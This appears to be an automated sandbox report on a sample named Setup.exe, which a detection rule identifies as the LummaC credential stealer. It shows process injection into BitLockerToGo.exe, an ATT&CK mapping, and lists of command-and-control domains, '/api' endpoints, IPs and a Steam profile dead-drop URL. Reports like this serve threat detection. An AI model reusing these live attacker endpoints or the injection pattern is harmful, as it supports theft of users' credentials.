    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44B000Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45C000Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Users\user\Desktop\Setup.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		311
    Process Injection    		2
    Virtualization/Sandbox Evasion    		OS Credential Dumping11
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		311
    Process Injection    		LSASS Memory2
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol2
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Native API    		Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager1
    Account Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell    		Login HookLogin Hook2
    Obfuscated Files or Information    		NTDS22
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Setup.exe16%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    condifendteu.sbs
    		104.21.79.35
    		truetrue
      		unknown
      steamcommunity.com
      		104.102.49.254
      		truetrue
        		unknown
        vennurviot.sbs
        		172.67.140.193
        		truetrue
          		unknown
          drawwyobstacw.sbs
          		188.114.96.3
          		truetrue
            		unknown
            mathcucom.sbs
            		188.114.97.3
            		truetrue
              		unknown
              divewanntwj.biz
              		188.114.97.3
              		truetrue
                		unknown
                sergei-esenin.com
                		172.67.206.204
                		truetrue
                  		unknown
                  ehticsprocw.sbs
                  		172.67.173.224
                  		truetrue
                    		unknown
                    resinedyw.sbs
                    		104.21.77.78
                    		truetrue
                      		unknown
                      enlargkiw.sbs
                      		104.21.33.249
                      		truetrue
                        		unknown
                        allocatinow.sbs
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          enlargkiw.sbstrue
                            		unknown
                            allocatinow.sbstrue
                              		unknown
                              drawwyobstacw.sbstrue
                                		unknown
                                mathcucom.sbstrue
                                  		unknown
                                  https://steamcommunity.com/profiles/76561199724331900true
                                  • URL Reputation: malware
                                  		unknown
                                  https://vennurviot.sbs/apitrue
                                    		unknown
                                    ehticsprocw.sbstrue
                                      		unknown
                                      https://divewanntwj.biz/apitrue
                                        		unknown
                                        condifendteu.sbstrue
                                          		unknown
                                          https://drawwyobstacw.sbs/apitrue
                                            		unknown
                                            https://resinedyw.sbs/apitrue
                                              		unknown
                                              https://mathcucom.sbs/apitrue
                                                		unknown
                                                resinedyw.sbstrue
                                                  		unknown
                                                  vennurviot.sbstrue
                                                    		unknown
                                                    https://condifendteu.sbs/apitrue
                                                      		unknown
                                                      divewanntwj.biztrue
                                                        		unknown
                                                        https://enlargkiw.sbs/apitrue
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://github.com/aws/jsiiSetup.exe, program.js.0.drfalse
                                                            		unknown
                                                            https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://sergei-esenin.com/BitLockerToGo.exe, 00000002.00000002.2400111218.0000000003188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://allocatinow.sbs/3lBitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://vennurviot.sbs/BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://aws.amazon.comSetup.exe, program.js.0.drfalse
                                                                          		unknown
                                                                          http://microsoft.coBitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://enlargkiw.sbs/BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://jsperf.com/object-keys-vs-for-in-with-closure/3Setup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • URL Reputation: malware
                                                                                		unknown
                                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://github.com/aws/jsii.gitSetup.exe, program.js.0.drfalse
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://mathcucom.sbs/BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297598155.00000000031AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://github.com/aws/jsii/issuesSetup.exe, program.js.0.drfalse
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://mathcucom.sbs/apijBitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://store.steampowered.com/news/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://json-schema.org/schemaSetup.exe, program.js.0.drfalse
                                                                                                  		unknown
                                                                                                  https://github.com/jprichardson/node-fs-extra/issues/269program.js.0.drfalse
                                                                                                    		unknown
                                                                                                    http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://allocatinow.sbs/apiBitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://allocatinow.sbs/api1BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#program.js.0.drfalse
                                                                                                            		unknown
                                                                                                            http://json-schema.org/draft-07/schemaSetup.exe, program.js.0.drfalse
                                                                                                              		unknown
                                                                                                              https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://sergei-esenin.com/apiCBitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://store.steampowered.com/stats/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://resinedyw.sbs/BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://allocatinow.sbs/piBitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=eBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://ehticsprocw.sbs/li3BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://steamcommunity.com/workshop/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://store.steampowered.com/legal/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://allocatinow.sbs/coBitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://json-schema.org/draft-07/schema#program.js.0.drfalse
                                                                                                                                  		unknown
                                                                                                                                  http://jsperf.com/1-vs-infinitySetup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://store.steampowered.com/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://allocatinow.sbs/BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQABitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://store.steampowered.com/account/cookiepreferences/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://store.steampowered.com/mobileBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown

                                                                                                                                        World Map of Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public IPs

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        188.114.97.3
                                                                                                                                        		mathcucom.sbsEuropean Union
                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                        104.21.33.249
                                                                                                                                        		enlargkiw.sbsUnited States
                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                        172.67.173.224
                                                                                                                                        		ehticsprocw.sbsUnited States
                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                        188.114.96.3
                                                                                                                                        		drawwyobstacw.sbsEuropean Union
                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                        104.102.49.254
                                                                                                                                        		steamcommunity.comUnited States
